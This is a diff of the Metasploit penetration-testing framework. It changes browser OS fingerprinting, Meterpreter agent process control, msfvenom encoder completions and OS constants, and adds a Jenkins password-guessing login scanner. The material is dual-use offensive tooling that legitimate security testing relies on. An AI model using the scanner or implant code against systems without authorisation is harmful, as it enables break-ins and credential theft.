case "5716599":
@ -799,7 +809,7 @@ os_detect.getVersion = function(){
// Since this scriptengine applies to more than one major version of
// IE, rely on the object detection below to determine ua_version.
//ua_version = "6.0";
os_flavor = "XP";
os_name = "Windows XP";
os_sp = "SP3";
break;
case "575730":
@ -814,19 +824,19 @@ os_detect.getVersion = function(){
case "5718066":
// IE 7.0.5730.13, XP Professional SP3 English
ua_version = "7.0";
os_flavor = "XP";
os_name = "Windows XP";
os_sp = "SP3";
break;
case "5722589":
// IE 7.0.5730.13, XP Professional SP3 English
ua_version = "7.0";
os_flavor = "XP";
os_name = "Windows XP";
os_sp = "SP3";
break;
case "576000":
// IE 7.0.6000.16386, Vista Ultimate SP0 English
ua_version = "7.0";
os_flavor = "Vista";
os_name = "Windows Vista";
os_sp = "SP0";
break;
case "580":
@ -838,13 +848,13 @@ os_detect.getVersion = function(){
case "5816762":
// IE 8.0.7600.16385, Windows 7 English
ua_version = "8.0";
os_flavor = "7";
os_name = "Windows 7";
os_sp = "SP0";
break;
case "5817514":
// IE 8.0.7600.17514, Windows 7 SP1 English
ua_version = "8.0";
os_flavor = "7";
os_name = "Windows 7";
os_sp = "SP1";
break;
case "5818702":
@ -852,104 +862,109 @@ os_detect.getVersion = function(){
case "5822960":
// IE 8.0.6001.18702, XP Professional SP3 Greek
ua_version = "8.0";
os_flavor = "XP";
os_name = "Windows XP";
os_sp = "SP3";
break;
case "9016406":
// IE 9.0.7930.16406, Windows 7 64-bit
ua_version = "9.0";
os_flavor = "7";
os_name = "Windows 7";
os_sp = "SP0";
break;
case "9016441":
// IE 9.0.8112.16421, Windows 7 32-bit English
ua_version = "9.0";
os_flavor = "7";
os_name = "Windows 7";
os_sp = "SP1";
break;
case "9016443":
// IE 9.0.8112.16421, Windows 7 Polish
// Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
ua_version = "9.0";
os_flavor = "7";
os_name = "Windows 7";
os_sp = "SP1";
break;
case "9016446":
// IE 9.0.8112.16421, Windows 7 English (Update Versions: 9.0.7 (KB2699988)
// Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; MASA; InfoPath.3; MS-RTC LM 8; BRI/2)Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; MASA; InfoPath.3; MS-RTC LM 8; BRI/2)
ua_version = "9.0";
os_flavor = "7";
os_name = "Windows 7";
os_sp = "SP1";
break;
case "9016464":
// browsershots.org, MSIE 7.0 / Windows 2008 R2
os_flavor = "2008R2";
os_name = "Windows 2008 R2";
ua_version = "9.0";
break;
case "9016470":
// IE 9.0.8112.16421 / Windows 7 SP1
ua_version = "9.0";
os_flavor = "7";
os_name = "Windows 7";
os_sp = "SP1";
break;
case "9016502":
// IE 9.0.8112.16502 / Windows 7 SP1
ua_version = "9.0";
os_flavor = "7";
os_name = "Windows 7";
os_sp = "SP1";
break;
case "9016506":
// IE 9.0.8112.16506 / Windows 7 SP1
ua_version = "9.0";
os_flavor = "7";
os_name = "Windows 7";
os_sp = "SP1";
break;
case "9016514":
// IE 9.0.8112.16514 / Windows 7 SP1
ua_version = "9.0";
os_flavor = "7";
os_name = "Windows 7";
os_sp = "SP1";
break;
case "9016520":
// IE 9.0.8112.16520 / Windows 7 SP1
ua_version = "9.0";
os_flavor = "7";
os_name = "Windows 7";
os_sp = "SP1";
break;
case "9016526":
// IE 9.0.8112.16526 / Windows 7 SP1
ua_version = "9.0";
os_flavor = "7";
os_name = "Windows 7";
os_sp = "SP1";
break;
case "9016533":
// IE 9.0.8112.16533 / Windows 7 SP1
ua_version = "9.0";
os_flavor = "7";
os_name = "Windows 7";
os_sp = "SP1";
break;
case "10016720":
// IE 10.0.9200.16721 / Windows 7 SP1
ua_version = "10.0";
os_flavor = "7";
os_name = "Windows 7";
os_sp = "SP1";
break;
case "11016428":
// IE 11.0.9600.16428 / Windows 7 SP1
ua_version = "11.0";
os_flavor = "7";
os_name = "Windows 7";
os_sp = "SP1";
break;
case "10016384":
// IE 10.0.9200.16384 / Windows 8 x86
ua_version = "10.0";
os_flavor = "8";
os_name = "Windows 8";
os_sp = "SP0";
break;
case "11016426":
// IE 11.0.9600.16476 / KB2898785 (Technically: 11.0.2) Windows 8.1 x86 English
ua_version = "11.0";
os_name = "Windows 8.1";
break;
case "1000":
// IE 10.0.8400.0 (Pre-release + KB2702844), Windows 8 x86 English Pre-release
ua_version = "10.0";
os_flavor = "8";
os_name = "Windows 8";
os_sp = "SP0";
break;
default:
@ -1015,7 +1030,7 @@ os_detect.getVersion = function(){
if (!os_name && navigator.platform == "Win32") { os_name = oses_windows; }
//--
// Flavor
// Figure out the type of Windows
//--
if (!ua_is_lying) {
version = useragent.toLowerCase();
@ -1032,27 +1047,28 @@ os_detect.getVersion = function(){
else if (version.indexOf("mac") != -1) { os_name = oses_mac_osx; }
else if (version.indexOf("linux") != -1) { os_name = oses_linux; }
}
if (os_name == oses_windows && (!os_flavor || 0 == os_flavor.length)) {
if (version.indexOf("windows 95") != -1) { os_flavor = "95"; }
else if (version.indexOf("windows nt 4") != -1) { os_flavor = "NT"; }
else if (version.indexOf("win 9x 4.9") != -1) { os_flavor = "ME"; }
else if (version.indexOf("windows 98") != -1) { os_flavor = "98"; }
else if (version.indexOf("windows nt 5.0") != -1) { os_flavor = "2000"; }
else if (version.indexOf("windows nt 5.1") != -1) { os_flavor = "XP"; }
else if (version.indexOf("windows nt 5.2") != -1) { os_flavor = "2003"; }
else if (version.indexOf("windows nt 6.0") != -1) { os_flavor = "Vista"; }
else if (version.indexOf("windows nt 6.1") != -1) { os_flavor = "7"; }
else if (version.indexOf("windows nt 6.2") != -1) { os_flavor = "8"; }
if (os_name == oses_windows) {
if (version.indexOf("windows 95") != -1) { os_name = "Windows 95"; }
else if (version.indexOf("windows nt 4") != -1) { os_name = "Windows NT"; }
else if (version.indexOf("win 9x 4.9") != -1) { os_name = "Windows ME"; }
else if (version.indexOf("windows 98") != -1) { os_name = "Windows 98"; }
else if (version.indexOf("windows nt 5.0") != -1) { os_name = "Windows 2000"; }
else if (version.indexOf("windows nt 5.1") != -1) { os_name = "Windows XP"; }
else if (version.indexOf("windows nt 5.2") != -1) { os_name = "Windows 2003"; }
else if (version.indexOf("windows nt 6.0") != -1) { os_name = "Windows Vista"; }
else if (version.indexOf("windows nt 6.1") != -1) { os_name = "Windows 7"; }
else if (version.indexOf("windows nt 6.2") != -1) { os_name = "Windows 8"; }
else if (version.indexOf("windows nt 6.3") != -1) { os_name = "Windows 8.1"; }
}
if (os_name == oses_linux && (!os_flavor || 0 == os_flavor.length)) {
if (version.indexOf("gentoo") != -1) { os_flavor = "Gentoo"; }
else if (version.indexOf("ubuntu") != -1) { os_flavor = "Ubuntu"; }
else if (version.indexOf("debian") != -1) { os_flavor = "Debian"; }
else if (version.indexOf("rhel") != -1) { os_flavor = "RHEL"; }
else if (version.indexOf("red hat") != -1) { os_flavor = "RHEL"; }
else if (version.indexOf("centos") != -1) { os_flavor = "CentOS"; }
else if (version.indexOf("fedora") != -1) { os_flavor = "Fedora"; }
else if (version.indexOf("android") != -1) { os_flavor = "Android"; }
if (os_name == oses_linux && (!os_vendor || 0 == os_vendor.length)) {
if (version.indexOf("gentoo") != -1) { os_vendor = "Gentoo"; }
else if (version.indexOf("ubuntu") != -1) { os_vendor = "Ubuntu"; }
else if (version.indexOf("debian") != -1) { os_vendor = "Debian"; }
else if (version.indexOf("rhel") != -1) { os_vendor = "RHEL"; }
else if (version.indexOf("red hat") != -1) { os_vendor = "RHEL"; }
else if (version.indexOf("centos") != -1) { os_vendor = "CentOS"; }
else if (version.indexOf("fedora") != -1) { os_vendor = "Fedora"; }
else if (version.indexOf("android") != -1) { os_vendor = "Android"; }
}
//--
@ -1110,7 +1126,9 @@ os_detect.getVersion = function(){
this.ua_is_lying = ua_is_lying;
this.os_name = os_name;
this.os_vendor = os_vendor;
this.os_flavor = os_flavor;
this.os_device = os_device;
this.os_sp = os_sp;
this.os_lang = os_lang;
this.arch = arch;
@ -1118,7 +1136,7 @@ os_detect.getVersion = function(){
this.ua_version = ua_version;
this.ua_version = ua_version;
return { os_name:os_name, os_flavor:os_flavor, os_sp:os_sp, os_lang:os_lang, arch:arch, ua_name:ua_name, ua_version:ua_version };
return { os_name:os_name, os_vendor:os_vendor, os_flavor:os_flavor, os_device:os_device, os_sp:os_sp, os_lang:os_lang, arch:arch, ua_name:ua_name, ua_version:ua_version };
}; // function getVersion
os_detect.searchVersion = function(needle, haystack) {

37
data/meterpreter/ext_server_stdapi.py
View File

@ -472,10 +472,14 @@ ERROR_FAILURE = 1
ERROR_CONNECTION_ERROR = 10000
# Windows Constants
GAA_FLAG_SKIP_ANYCAST = 0x0002
GAA_FLAG_SKIP_MULTICAST = 0x0004
GAA_FLAG_INCLUDE_PREFIX = 0x0010
GAA_FLAG_SKIP_DNS_SERVER = 0x0080
GAA_FLAG_SKIP_ANYCAST = 0x0002
GAA_FLAG_SKIP_MULTICAST = 0x0004
GAA_FLAG_INCLUDE_PREFIX = 0x0010
GAA_FLAG_SKIP_DNS_SERVER = 0x0080
PROCESS_TERMINATE = 0x0001
PROCESS_VM_READ = 0x0010
PROCESS_QUERY_INFORMATION = 0x0400
PROCESS_QUERY_LIMITED_INFORMATION = 0x1000
WIN_AF_INET = 2
WIN_AF_INET6 = 23
@ -666,12 +670,11 @@ def stdapi_sys_config_sysinfo(request, response):
@meterpreter.register_function
def stdapi_sys_process_close(request, response):
proc_h_id = packet_get_tlv(request, TLV_TYPE_PROCESS_HANDLE)
proc_h_id = packet_get_tlv(request, TLV_TYPE_HANDLE)
if not proc_h_id:
return ERROR_SUCCESS, response
proc_h_id = proc_h_id['value']
proc_h = meterpreter.channels[proc_h_id]
proc_h.kill()
del meterpreter.processes[proc_h_id]
return ERROR_SUCCESS, response
@meterpreter.register_function
@ -720,6 +723,23 @@ def stdapi_sys_process_getpid(request, response):
response += tlv_pack(TLV_TYPE_PID, os.getpid())
return ERROR_SUCCESS, response
@meterpreter.register_function
def stdapi_sys_process_kill(request, response):
for pid in packet_enum_tlvs(request, TLV_TYPE_PID):
pid = pid['value']
if has_windll:
k32 = ctypes.windll.kernel32
proc_h = k32.OpenProcess(PROCESS_TERMINATE, False, pid)
if not proc_h:
return ERROR_FAILURE, response
if not k32.TerminateProcess(proc_h, 0):
return ERROR_FAILURE, response
elif hasattr(os, 'kill'):
os.kill(pid, 9)
else:
return ERROR_FAILURE, response
return ERROR_SUCCESS, response
def stdapi_sys_process_get_processes_via_proc(request, response):
for pid in os.listdir('/proc'):
pgroup = bytes()
@ -772,9 +792,6 @@ def stdapi_sys_process_get_processes_via_ps(request, response):
def stdapi_sys_process_get_processes_via_windll(request, response):
TH32CS_SNAPPROCESS = 2
PROCESS_QUERY_INFORMATION = 0x0400
PROCESS_QUERY_LIMITED_INFORMATION = 0x1000
PROCESS_VM_READ = 0x10
TOKEN_QUERY = 0x0008
TokenUser = 1
k32 = ctypes.windll.kernel32

1
data/meterpreter/meterpreter.py
View File

@ -332,7 +332,6 @@ class PythonMeterpreter(object):
response = self.create_response(request)
self.socket.send(response)
else:
channels_for_removal = []
# iterate over the keys because self.channels could be modified if one is closed
channel_ids = list(self.channels.keys())
for channel_id in channel_ids:

4
documentation/samples/modules/exploits/ie_browser.rb
View File

@ -29,7 +29,7 @@ class Metasploit4 < Msf::Exploit::Remote
:ua_minver => "8.0",
:ua_maxver => "10.0",
:javascript => true,
:os_name => OperatingSystems::WINDOWS,
:os_name => OperatingSystems::Match::WINDOWS,
:rank => NormalRanking
})
@ -85,6 +85,8 @@ class Metasploit4 < Msf::Exploit::Remote
os_name = 'Windows 7'
when '6.2'
os_name = 'Windows 8'
when '6.3'
os_name = 'Windows 8.1'
end
targets.each do |t|

3
external/zsh/README.md vendored Normal file
View File

@ -0,0 +1,3 @@
Metasploit completion definitions for zsh. The directory containing the
completion files needs to be added to the ```$fpath``` environment variable,
this is usually done in the ```~/.zshrc``` file.

39
external/zsh/_msfconsole vendored Normal file
View File

@ -0,0 +1,39 @@
#compdef msfconsole
# ------------------------------------------------------------------------------
# License
# -------
# This file is part of the Metasploit Framework and is released under the MSF
# License, please see the COPYING file for more details.
#
# ------------------------------------------------------------------------------
# Description
# -----------
#
# Completion script for the Metasploit Framework's msfconsole command
# (http://www.metasploit.com/).
#
# ------------------------------------------------------------------------------
# Authors
# -------
#
# * Spencer McIntyre
#
# ------------------------------------------------------------------------------
_arguments \
{-a,--ask}"[Ask before exiting Metasploit or accept 'exit -y']" \
"-c[Load the specified configuration file]:configuration file:_files" \
{-d,--defanged}"[Execute the console as defanged]" \
{-E,--environment}"[Specify the database environment to load from the configuration]:environment:(production development)" \
{-h,--help}"[Show help text]" \
{-L,--real-readline}"[Use the system Readline library instead of RbReadline]" \
{-M,--migration-path}"[Specify a directory containing additional DB migrations]:directory:_files -/" \
{-m,--module-path}"[Specifies an additional module search path]:search path:_files -/" \
{-n,--no-database}"[Disable database support]" \
{-o,--output}"[Output to the specified file]:output file" \
{-p,--plugin}"[Load a plugin on startup]:plugin file:_files" \
{-q,--quiet}"[Do not print the banner on start up]" \
{-r,--resource}"[Execute the specified resource file]:resource file:_files" \
{-v,--version}"[Show version]" \
{-x,--execute-command}"[Execute the specified string as console commands]:commands" \
{-y,--yaml}"[Specify a YAML file containing database settings]:yaml file:_files"

82
external/zsh/_msfencode vendored Normal file
View File

@ -0,0 +1,82 @@
#compdef msfencode
# ------------------------------------------------------------------------------
# License
# -------
# This file is part of the Metasploit Framework and is released under the MSF
# License, please see the COPYING file for more details.
#
# ------------------------------------------------------------------------------
# Description
# -----------
#
# Completion script for the Metasploit Framework's msfencode command
# (http://www.metasploit.com/).
#
# ------------------------------------------------------------------------------
# Authors
# -------
#
# * Spencer McIntyre
#
# ------------------------------------------------------------------------------
_msfencode_encoders_list=(
'cmd/generic_sh'
'cmd/ifs'
'cmd/powershell_base64'
'cmd/printf_php_mq'
'generic/eicar'
'generic/none'
'mipsbe/byte_xori'
'mipsbe/longxor'
'mipsle/byte_xori'
'mipsle/longxor'
'php/base64'
'ppc/longxor'
'ppc/longxor_tag'
'sparc/longxor_tag'
'x64/xor'
'x86/add_sub'
'x86/alpha_mixed'
'x86/alpha_upper'
'x86/avoid_underscore_tolower'
'x86/avoid_utf8_tolower'
'x86/bloxor'
'x86/call4_dword_xor'
'x86/context_cpuid'
'x86/context_stat'
'x86/context_time'
'x86/countdown'
'x86/fnstenv_mov'
'x86/jmp_call_additive'
'x86/nonalpha'
'x86/nonupper'
'x86/opt_sub'
'x86/shikata_ga_nai'
'x86/single_static_bit'
'x86/unicode_mixed'
'x86/unicode_upper'
)
_msfencode_encoder() {
_describe -t encoders 'available encoders' _msfencode_encoders_list || compadd "$@"
}
_arguments \
"-a[The architecture to encode as]:architecture:(cmd generic mipsbe mipsle php ppc sparc x64 x86)" \
"-b[The list of characters to avoid, example: '\x00\xff']:bad characters" \
"-c[The number of times to encode the data]:times" \
"-d[Specify the directory in which to look for EXE templates]:template file:_files -/" \
"-e[The encoder to use]:encoder:_msfencode_encoder" \
"-h[Help banner]" \
"-i[Encode the contents of the supplied file path]:input file:_files" \
"-k[Keep template working; run payload in new thread (use with -x)]" \
"-l[List available encoders]" \
"-m[Specifies an additional module search path]:module path:_files -/" \
"-n[Dump encoder information]" \
"-o[The output file]:output file" \
"-p[The platform to encode for]:target platform:(android bsd bsdi java linux netware nodejs osx php python ruby solaris unix win)" \
"-s[The maximum size of the encoded data]:maximum size" \
"-t[The output format]:output format:(bash c csharp dw dword java js_be js_le num perl pl powershell ps1 py python raw rb ruby sh vbapplication vbscript asp aspx aspx-exe dll elf exe exe-only exe-service exe-small loop-vbs macho msi msi-nouac osx-app psh psh-net psh-reflection vba vba-exe vbs war)" \
"-v[Increase verbosity]" \
"-x[Specify an alternate executable template]:template file:_files"

81
external/zsh/_msfvenom vendored Normal file
View File

@ -0,0 +1,81 @@
#compdef msfvenom
# ------------------------------------------------------------------------------
# License
# -------
# This file is part of the Metasploit Framework and is released under the MSF
# License, please see the COPYING file for more details.
#
# ------------------------------------------------------------------------------
# Description
# -----------
#
# Completion script for the Metasploit Framework's msfvenom command
# (http://www.metasploit.com/).
#
# ------------------------------------------------------------------------------
# Authors
# -------
#
# * Spencer McIntyre
#
# ------------------------------------------------------------------------------
_msfvenom_encoders_list=(
'cmd/generic_sh'
'cmd/ifs'
'cmd/powershell_base64'
'cmd/printf_php_mq'
'generic/eicar'
'generic/none'
'mipsbe/byte_xori'
'mipsbe/longxor'
'mipsle/byte_xori'
'mipsle/longxor'
'php/base64'
'ppc/longxor'
'ppc/longxor_tag'
'sparc/longxor_tag'
'x64/xor'
'x86/add_sub'
'x86/alpha_mixed'
'x86/alpha_upper'
'x86/avoid_underscore_tolower'
'x86/avoid_utf8_tolower'
'x86/bloxor'
'x86/call4_dword_xor'
'x86/context_cpuid'
'x86/context_stat'
'x86/context_time'
'x86/countdown'
'x86/fnstenv_mov'
'x86/jmp_call_additive'
'x86/nonalpha'
'x86/nonupper'
'x86/opt_sub'
'x86/shikata_ga_nai'
'x86/single_static_bit'
'x86/unicode_mixed'
'x86/unicode_upper'
)
_msfvenom_encoder() {
_describe -t encoders 'available encoders' _msfvenom_encoders_list || compadd "$@"
}
_arguments \
{-a,--arch}"[The architecture to encode as]:architecture:(cmd generic mipsbe mipsle php ppc sparc x64 x86)" \
{-b,--bad-chars}"[The list of characters to avoid, example: '\x00\xff']:bad characters" \
{-c,--add-code}"[Specify an additional win32 shellcode file to include]:shellcode file:_files" \
{-e,--encoder}"[The encoder to use]:encoder:_msfvenom_encoder" \
{-f,--format}"[Output format]:output format:(bash c csharp dw dword java js_be js_le num perl pl powershell ps1 py python raw rb ruby sh vbapplication vbscript asp aspx aspx-exe dll elf exe exe-only exe-service exe-small loop-vbs macho msi msi-nouac osx-app psh psh-net psh-reflection vba vba-exe vbs war)" \
"--help-formats[List available formats]" \
{-h,--help}"[Help banner]" \
{-i,--iterations}"[The number of times to encode the payload]:iterations" \
{-k,--keep}"[Preserve the template behavior and inject the payload as a new thread]" \
{-l,--list}"[List a module type]:module type:(all encoders nops payloads)" \
{-n,--nopsled}"[Prepend a nopsled of length size on to the payload]:nopsled length" \
{-o,--options}"[List the payload's standard options]" \
"--platform[The platform to encode for]:target platform:(android bsd bsdi java linux netware nodejs osx php python ruby solaris unix win)" \
{-p,--payload}"[Payload to use. Specify a '-' or stdin to use custom payloads]:payload" \
{-s,--space}"[The maximum size of the resulting payload]:length" \
{-x,--template}"[Specify an alternate executable template]:template file:_files"

10
lib/metasploit/framework/common_engine.rb
View File

@ -4,6 +4,14 @@
require 'fileutils'
#
# Metasploit gem engines
#
require 'metasploit/model/engine'
require 'metasploit/concern/engine'
Metasploit::Framework::Require.optionally_require_metasploit_db_gem_engines
# `Rails::Engine` behavior common to both {Metasploit::Framework::Application} and {Metasploit::Framework::Engine}.
module Metasploit::Framework::CommonEngine
extend ActiveSupport::Concern
@ -73,4 +81,4 @@ module Metasploit::Framework::CommonEngine
end
end
end
end
end

60
lib/metasploit/framework/login_scanner/jenkins.rb Normal file
View File

@ -0,0 +1,60 @@
require 'metasploit/framework/login_scanner/http'
module Metasploit
module Framework
module LoginScanner
# Jenkins login scanner
class Jenkins < HTTP
# Inherit LIKELY_PORTS,LIKELY_SERVICE_NAMES, and REALM_KEY from HTTP
CAN_GET_SESSION = true
DEFAULT_PORT = 8080
PRIVATE_TYPES = [ :password ]
# (see Base#set_sane_defaults)
def set_sane_defaults
self.uri = "/j_acegi_security_check" if self.uri.nil?
self.method = "POST" if self.method.nil?
super
end
def attempt_login(credential)
result_opts = {
credential: credential,
host: host,
port: port,
protocol: 'tcp'
}
if ssl
result_opts[:service_name] = 'https'
else
result_opts[:service_name] = 'http'
end
begin
cli = Rex::Proto::Http::Client.new(host, port, {}, ssl, ssl_version)
cli.connect
req = cli.request_cgi({
'method'=>'POST',
'uri'=>'/j_acegi_security_check',
'vars_post'=> {
'j_username' => credential.public,
'j_password'=>credential.private
}
})
res = cli.send_recv(req)
if res && !res.headers['location'].include?('loginError')
result_opts.merge!(status: Metasploit::Model::Login::Status::SUCCESSFUL, proof: res.headers)
else
result_opts.merge!(status: Metasploit::Model::Login::Status::INCORRECT, proof: res)
end
rescue ::EOFError, Errno::ETIMEDOUT, Rex::ConnectionError, ::Timeout::Error
result_opts.merge!(status: Metasploit::Model::Login::Status::UNABLE_TO_CONNECT)
end
Result.new(result_opts)
end
end
end
end
end

17
lib/metasploit/framework/require.rb
View File

@ -72,6 +72,23 @@ module Metasploit
end
end
# Tries to require gems necessary for using a database with the framework.
#
# @example
# Metasploit::Framework::Require.optionally_require_metasploit_db_gems
#
# @return [void]
def self.optionally_require_metasploit_db_gem_engines
optionally(
'metasploit/credential/engine',
'metasploit-credential not in the bundle',
)
optionally(
'metasploit_data_models/engine',
'metaspoit_data_models not in the bundle'
)
end
#
# Instance Methods
#

81
lib/msf/base/serializer/readable_text.rb
View File

@ -31,7 +31,7 @@ class ReadableText
when MODULE_AUX
return dump_auxiliary_module(mod, indent)
when MODULE_POST
return dump_basic_module(mod, indent)
return dump_post_module(mod, indent)
else
return dump_generic_module(mod, indent)
end
@ -84,14 +84,14 @@ class ReadableText
tbl.to_s + "\n"
end
# Dumps an auxiliary's actions
# Dumps a module's actions
#
# @param mod [Msf::Auxiliary] the auxiliary module.
# @param mod [Msf::Module] the module.
# @param indent [String] the indentation to use (only the length
# matters)
# @param h [String] the string to display as the table heading.
# @return [String] the string form of the table.
def self.dump_auxiliary_actions(mod, indent = '', h = nil)
def self.dump_module_actions(mod, indent = '', h = nil)
tbl = Rex::Ui::Text::Table.new(
'Indent' => indent.length,
'Header' => h,
@ -108,6 +108,28 @@ class ReadableText
tbl.to_s + "\n"
end
# Dumps the module's selected action
#
# @param mod [Msf::Module] the module.
# @param indent [String] the indentation to use (only the length
# matters)
# @param h [String] the string to display as the table heading.
# @return [String] the string form of the table.
def self.dump_module_action(mod, indent = '', h = nil)
tbl = Rex::Ui::Text::Table.new(
'Indent' => indent.length,
'Header' => h,
'Columns' =>
[
'Name',
'Description',
])
tbl << [ mod.action.name || 'All', mod.action.description || '' ]
tbl.to_s + "\n"
end
# Dumps the table of payloads that are compatible with the supplied
# exploit.
#
@ -210,6 +232,57 @@ class ReadableText
}
output << "\n"
# Actions
if mod.action
output << "Available actions:\n"
output << dump_module_actions(mod, indent)
end
# Options
if (mod.options.has_options?)
output << "Basic options:\n"
output << dump_options(mod, indent)
output << "\n"
end
# Description
output << "Description:\n"
output << word_wrap(Rex::Text.compress(mod.description))
output << "\n"
# References
output << dump_references(mod, indent)
return output
end
# Dumps information about a post module.
#
# @param mod [Msf::Post] the post module.
# @param indent [String] the indentation to use.
# @return [String] the string form of the information.
def self.dump_post_module(mod, indent = '')
output = "\n"
output << " Name: #{mod.name}\n"
output << " Module: #{mod.fullname}\n"
output << " Platform: #{mod.platform_to_s}\n"
output << " Arch: #{mod.arch_to_s}\n"
output << " Rank: #{mod.rank_to_s.capitalize}\n"
output << "\n"
# Authors
output << "Provided by:\n"
mod.each_author { |author|
output << indent + author.to_s + "\n"
}
output << "\n"
# Actions
if mod.action
output << "Available actions:\n"
output << dump_module_actions(mod, indent)
end
# Options
if (mod.options.has_options?)
output << "Basic options:\n"

3
lib/msf/base/sessions/meterpreter.rb
View File

@ -347,7 +347,8 @@ class Meterpreter < Rex::Post::Meterpreter::Client
self.db_record.save!
end
framework.db.update_host_via_sysinfo(:host => self, :workspace => wspace, :info => sysinfo)
# XXX: This is obsolete given the Mdm::Host.normalize_os() support for host.os.session_fingerprint
# framework.db.update_host_via_sysinfo(:host => self, :workspace => wspace, :info => sysinfo)
if nhost
framework.db.report_note({

39
lib/msf/core/constants.rb
View File

@ -58,14 +58,17 @@ module HttpClients
UNKNOWN = "Unknown"
end
module OperatingSystems
LINUX = "Linux"
MAC_OSX = "Mac OS X"
WINDOWS = "Microsoft Windows"
WINDOWS = "Windows"
FREEBSD = "FreeBSD"
NETBSD = "NetBSD"
OPENBSD = "OpenBSD"
VMWARE = "VMware"
ANDROID = "Android"
APPLE_IOS = "iOS"
module VmwareVersions
ESX = "ESX"
@ -73,17 +76,48 @@ module OperatingSystems
end
module WindowsVersions
NINE5 = "95"
NINE8 = "98"
NT = "NT"
XP = "XP"
TWOK = "2000"
TWOK3 = "2003"
VISTA = "Vista"
TWOK8 = "2008"
TWOK12 = "2012"
SEVEN = "7"
EIGHT = "8"
EIGHTONE = "8.1"
end
UNKNOWN = "Unknown"
module Match
WINDOWS = /^(?:Microsoft )?Windows/
WINDOWS_95 = /^(?:Microsoft )?Windows 95/
WINDOWS_98 = /^(?:Microsoft )?Windows 98/
WINDOWS_ME = /^(?:Microsoft )?Windows ME/
WINDOWS_NT3 = /^(?:Microsoft )?Windows NT 3/
WINDOWS_NT4 = /^(?:Microsoft )?Windows NT 4/
WINDOWS_2000 = /^(?:Microsoft )?Windows 2000/
WINDOWS_XP = /^(?:Microsoft )?Windows XP/
WINDOWS_2003 = /^(?:Microsoft )?Windows 2003/
WINDOWS_VISTA = /^(?:Microsoft )?Windows Vista/
WINDOWS_2008 = /^(?:Microsoft )?Windows 2008/
WINDOWS_7 = /^(?:Microsoft )?Windows 7/
WINDOWS_2012 = /^(?:Microsoft )?Windows 2012/
WINDOWS_8 = /^(?:Microsoft )?Windows 8/
WINDOWS_81 = /^(?:Microsoft )?Windows 8\.1/
LINUX = /^Linux/i
MAC_OSX = /^(?:Apple )?Mac OS X/
FREEBSD = /^FreeBSD/
NETBSD = /^NetBSD/
OPENBSD = /^OpenBSD/
VMWARE = /^VMware/
ANDROID = /^(?:Google )?Android/
APPLE_IOS = /^(?:Apple )?iOS/
end
end
end
@ -104,5 +138,4 @@ LICENSES =
BSD_LICENSE,
ARTISTIC_LICENSE,
UNKNOWN_LICENSE
]
]

22
lib/msf/core/db.rb
View File

@ -315,8 +315,8 @@ class DBManager
#
# The opts parameter can contain:
# +:state+:: -- one of the Msf::HostState constants
# +:os_name+:: -- one of the Msf::OperatingSystems constants
# +:os_flavor+:: -- something like "XP" or "Gentoo"
# +:os_name+:: -- something like "Windows", "Linux", or "Mac OS X"
# +:os_flavor+:: -- something like "Enterprise", "Pro", or "Home"
# +:os_sp+:: -- something like "SP2"
# +:os_lang+:: -- something like "English", "French", or "en-US"
# +:arch+:: -- one of the ARCH_* constants
@ -463,14 +463,11 @@ class DBManager
end
if info['OS'] =~ /^Windows\s*([^\(]+)\(([^\)]+)\)/i
res[:os_name] = "Microsoft Windows"
res[:os_flavor] = $1.strip
res[:os_name] = "Windows #{$1.strip}"
build = $2.strip
if build =~ /Service Pack (\d+)/
res[:os_sp] = "SP" + $1
else
res[:os_sp] = "SP0"
end
end
@ -3542,7 +3539,18 @@ class DBManager
:task => args[:task]
}
conf[:os_name] = os if os
if os
report_note(
:workspace => wspace,
:task => args[:task],
:host => ip,
:type => 'host.os.spiceworks_fingerprint',
:data => {
:os => os.to_s.strip
}
)
end
info = []
info << "Serial Number: #{serialno}" unless (serialno.blank? or serialno == name)

4
lib/msf/core/exploit/android.rb
View File

@ -89,8 +89,8 @@ module Exploit::Android
# The NDK stager is used to launch a hidden APK
def ndkstager(stagename, arch)
localfile = File.join(Msf::Config::InstallRoot, 'data', 'android', 'libs', NDK_FILES[arch] || arch, 'libndkstager.so')
data = File.read(localfile, :mode => 'rb')
path = ['data', 'android', 'libs', NDK_FILES[arch] || arch, 'libndkstager.so']
data = File.read(File.join(Msf::Config::InstallRoot, *path), :mode => 'rb')
data.gsub!('PLOAD', stagename)
end

139
lib/msf/core/exploit/http/client.rb
View File

@ -439,41 +439,86 @@ module Exploit::Remote::HttpClient
datastore['Proxies']
end
#
# Lookup HTTP fingerprints from the database that match the current
# destination host and port. This method falls back to using the old
# service.info field to represent the HTTP Server header.
#
# @option opts [String] :uri ('/') An HTTP URI to request in order to generate
# a fingerprint
# @option opts [String] :method ('GET') An HTTP method to use in the fingerprint
# request
def lookup_http_fingerprints(opts={})
uri = opts[:uri] || '/'
method = opts[:method] || 'GET'
fprints = []
return fprints unless framework.db.active
::ActiveRecord::Base.connection_pool.with_connection {
wspace = datastore['WORKSPACE'] ?
framework.db.find_workspace(datastore['WORKSPACE']) : framework.db.workspace
service = framework.db.get_service(wspace, rhost, 'tcp', rport)
return fprints unless service
# Order by note_id descending so the first value is the most recent
service.notes.where(:ntype => 'http.fingerprint').order("notes.id DESC").each do |n|
next unless n.data && n.data.kind_of?(::Hash)
next unless n.data[:uri] == uri && n.data[:method] == method
# Append additional fingerprints to the results as found
fprints.unshift n.data.dup
end
}
fprints
end
#
# Record various things about an HTTP server that we can glean from the
# response to a single request. If this method is passed a response, it
# will use it directly, otherwise it will check the database for a previous
# fingerprint. Failing that, it will make a request for /.
#
# Options:
# :response an Http::Packet as returned from any of the send_* methods
# Other options are passed directly to {#connect} if :response is not given
#
# Other options are passed directly to +connect+ if :response is not given
# @option opts [Rex::Proto::Http::Packet] :response The return value from any
# of the send_* methods
# @option opts [String] :uri ('/') An HTTP URI to request in order to generate
# a fingerprint
# @option opts [String] :method ('GET') An HTTP method to use in the fingerprint
# request
